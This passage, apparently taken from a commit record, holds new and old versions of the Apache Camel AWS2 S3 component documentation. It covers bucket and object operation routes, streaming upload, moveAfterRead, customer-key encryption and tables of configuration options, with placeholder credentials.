will list the buckets for this account\n\n- DeleteBucket: this operation delete the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation list object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation get a single object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in mycamelbucket bucket.\n\n- GetObjectRange: this operation get a single object range in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(S3Constants.RANGE_START, \"0\");\n exchange.getIn().setHeader(S3Constants.RANGE_END, \"9\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in mycamelbucket bucket, containing a the bytes from 0 to 9.\n\n- CreateDownloadLink: this operation will return a download link through S3 Presigner\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?accessKey=xxx&secretKey=yyy®ion=region&operation=createDownloadLink\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a download link url for the file camel-key in the bucket mycamelbucket and region region\n\n== Streaming Upload mode\n\nWith the stream mode enabled users will be able to upload data to S3 without knowing ahead of time the dimension of the data, by leveraging multipart upload.\nThe upload will be completed when: the batchSize has been completed or the batchMessageNumber has been reached.\nThere are two possible naming strategy: progressive and random. With the progressive strategy each file will have the name composed by keyName option and a progressive counter, and eventually the file extension (if any), while with the random strategy a UUID will be added after keyName and eventually the file extension will appended.\n\nAs an example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(kafka(\"topic1\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic1}}\/{{kafkaTopic1}}.txt\"));\n\nfrom(kafka(\"topic2\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic2}}\/{{kafkaTopic2}}.txt\"));\n--------------------------------------------------------------------------------\n\nThe default size for a batch is 1 Mb, but you can adjust it according to your requirements.\n\nWhen you'll stop your producer route, the producer will take care of flushing the remaining buffered messaged and complete the upload.\n\nIn Streaming upload you'll be able restart the producer from the point where it left. It's important to note that this feature is critical only when using the progressive naming strategy.\n\nBy setting the restartingPolicy to lastPart, you will restart uploading files and contents from the last part number the producer left.\n\nAs example: \n - Start the route with progressive naming strategy and keyname equals to camel.txt, with batchMessageNumber equals to 20, and restartingPolicy equals to lastPart\n - Send 70 messages.\n - Stop the route\n - On your S3 bucket you should now see 4 files: camel.txt, camel-1.txt, camel-2.txt and camel-3.txt, the first three will have 20 messages, while the last one only 10.\n - Restart the route\n - Send 25 messages\n - Stop the route\n - You'll now have 2 other files in your bucket: camel-5.txt and camel-6.txt, the first with 20 messages and second with 5 messages.\n - Go ahead\n\nThis won't be needed when using the random naming strategy.\n\nOn the opposite you can specify the override restartingPolicy. In that case you'll be able to override whatever you written before (for that particular keyName) on your bucket.\n\n[NOTE]\n====\nIn Streaming upload mode the only keyName option that will be taken into account is the endpoint option. Using the header will throw an NPE and this is done by design.\nSetting the header means potentially change the file name on each exchange and this is against the aim of the streaming upload producer. The keyName needs to be fixed and static. \nThe selected naming strategy will do the rest of the of the work.\n====\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users are able to avoid the autocreation of an S3 Bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false any operation on a not-existent bucket in AWS won't be successful and an error will be returned.\n\n== Moving stuff between a bucket and another bucket\n\nSome users like to consume stuff from a bucket and move the content in a different one without using the copyObject feature of this component.\nIf this is case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer, otherwise the file will be always overwritten on the same\noriginal bucket.\n\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead it has been added another option, moveAfterRead. With this option enabled the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. As example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\nYou have also the possibility of using a key prefix\/suffix while moving the file to a different bucket. The options are destinationBucketPrefix and destinationBucketSuffix.\n\nTaking the above example, you could do something like:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket&destinationBucketPrefix=RAW(pre-)&destinationBucketSuffix=RAW(-suff)\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\nSo if the file name is test, in the myothercamelbucket you should see a file called pre-test-suff.\n\n== Using customer key as encryption\n\nWe introduced also the customer key support (an alternative of using KMS). The following code shows an example.\n\n[source,java]\n--------------------------------------------------------------------------------\nString key = UUID.randomUUID().toString();\nbyte[] secretKey = generateSecretKey();\nString b64Key = Base64.getEncoder().encodeToString(secretKey);\nString b64KeyMd5 = Md5Utils.md5AsBase64(secretKey);\n\nString awsEndpoint = \"aws2-s3:\/\/mycamel?autoCreateBucket=false&useCustomerKey=true&customerKeyId=RAW(\" + b64Key + \")&customerKeyMD5=RAW(\" + b64KeyMd5 + \")&customerAlgorithm=\" + AES256.name();\n\nfrom(\"direct:putObject\")\n .setHeader(AWS2S3Constants.KEY, constant(\"test.txt\"))\n .setBody(constant(\"Test\"))\n .to(awsEndpoint);\n--------------------------------------------------------------------------------\n\n== Using a POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn AWS S3 there are multiple operations you can submit, as an example for List brokers request, you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:aws2-s3\")\n .setBody(ListObjectsRequest.builder().bucket(bucketName).build())\n .to(\"aws2-s3:\/\/test?amazonS3Client=#amazonS3Client&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Create S3 client and add component to registry\nSometimes you would want to perform some advanced configuration using AWS2S3Configuration which also allows to set the S3 client.\nYou can create and set the S3 client in the component configuration as shown in the following example\n\n[source,java]\n--------------------------------------------------------------------------------\nString awsBucketAccessKey = \"your_access_key\";\nString awsBucketSecretKey = \"your_secret_key\";\n\nS3Client s3Client = S3Client.builder().credentialsProvider(StaticCredentialsProvider.create(AwsBasicCredentials.create(awsBucketAccessKey, awsBucketSecretKey)))\n .region(Region.US_EAST_1).build();\n\nAWS2S3Configuration configuration = new AWS2S3Configuration();\nconfiguration.setAmazonS3Client(s3Client);\nconfiguration.setAutoDiscoverClient(true);\nconfiguration.setBucketName(\"s3bucket2020\");\nconfiguration.setRegion(\"us-east-1\");\n--------------------------------------------------------------------------------\n\nNow you can configure the S3 component (using the configuration object created above) and add it to the registry in the\nconfigure method before initialization of routes.\n\n[source,java]\n--------------------------------------------------------------------------------\nAWS2S3Component s3Component = new AWS2S3Component(getContext());\ns3Component.setConfiguration(configuration);\ns3Component.setLazyStartProducer(true);\ncamelContext.addComponent(\"aws2-s3\", s3Component);\n--------------------------------------------------------------------------------\n\nNow your component will be used for all the operations implemented in camel routes.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-s3<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\n\ninclude::{page-component-version}@camel-spring-boot::page$aws2-s3-starter.adoc[]\n","old_contents":"[[aws2-s3-component]]\n= AWS S3 Storage Service Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-aws\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc\n:docTitle: AWS S3 Storage Service\n:artifactId: camel-aws2-s3\n:description: Store and retrieve objects from AWS S3 Storage Service using AWS SDK version 2.x.\n:since: 3.2\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/aws2-s3.adoc[opts=optional]\n\/\/Manually maintained attributes\n:group: AWS\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 S3 component supports storing and retrieving objects from\/to\nhttps:\/\/aws.amazon.com\/s3[Amazon's S3] service.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon S3. More information is available at\nhttps:\/\/aws.amazon.com\/s3[Amazon S3].\n\n== URI Format\n\n------------------------------\naws2-s3:\/\/bucketNameOrArn[?options]\n------------------------------\n\nThe bucket will be created if it don't already exists. +\n You can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n\n\/\/ component-configure options: START\n== Configuring Options\n\nCamel components are configured on two separate levels:\n\n- component level\n- endpoint level\n\n=== Configuring Component Options\n\nThe component level is the highest level which holds general and common configurations that are inherited by the endpoints.\nFor example a component may have security settings, credentials for authentication, urls for network connection and so forth.\n\nSome components only have a few options, and others may have many. Because components typically have pre configured defaults\nthat are commonly used, then you may often only need to configure a few options on a component; or none at all.\n\nConfiguring components can be done with the xref:latest@manual::component-dsl.adoc[Component DSL],\nin a configuration file (application.properties|yaml), or directly with Java code.\n\n=== Configuring Endpoint Options\n\nWhere you find yourself configuring the most is on endpoints, as endpoints often have many options, which allows you to\nconfigure what you need the endpoint to do. The options are also categorized into whether the endpoint is used as consumer (from)\nor as a producer (to), or used for both.\n\nConfiguring endpoints is most often done directly in the endpoint URI as path and query parameters. You can also use\nthe xref:latest@manual::Endpoint-dsl.adoc[Endpoint DSL] as a _type safe_ way of configuring endpoints.\n\nA good practice when configuring options is to use xref:latest@manual::using-propertyplaceholder.adoc[Property Placeholders],\nwhich allows to not hardcode urls, port numbers, sensitive information, and other settings.\nIn other words placeholders allows to externalize the configuration from your code, and gives more flexibility and reuse.\n\nThe following two sections lists all the options, firstly for the component followed by the endpoint.\n\/\/ component-configure options: END\n\n\/\/ component options: START\n== Component Options\n\n\nThe AWS S3 Storage Service component supports 50 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *configuration* (common) | The component configuration | | AWS2S3Configuration\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\n== Endpoint Options\n\nThe AWS S3 Storage Service endpoint is configured using URI syntax:\n\n----\naws2-s3:\/\/bucketNameOrArn\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketNameOrArn* | *Required* Bucket name or ARN | | String\n|===\n\n\n=== Query Parameters (68 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *maxConnections* (consumer) | Set the maxConnections parameter in the S3 client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\nRequired S3 component options\n\nYou have to provide the amazonS3Client in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/s3[Amazon's S3].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you for instance to know how many messages exists in this\nbatch and for instance let the Aggregator\naggregate this number of messages.\n\n== Usage\n\nFor example in order to read file `hello.txt` from bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n=== Message headers evaluated by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3BucketName` |`String` |The bucket Name which this object will be stored or which will be used for the current operation\n\n|`CamelAwsS3BucketDestinationName` |`String` |The bucket Destination Name which will be used for the current operation\n\n|`CamelAwsS3ContentLength` |`Long` |The content length of this object.\n\n|`CamelAwsS3ContentType` |`String` |The content type of this 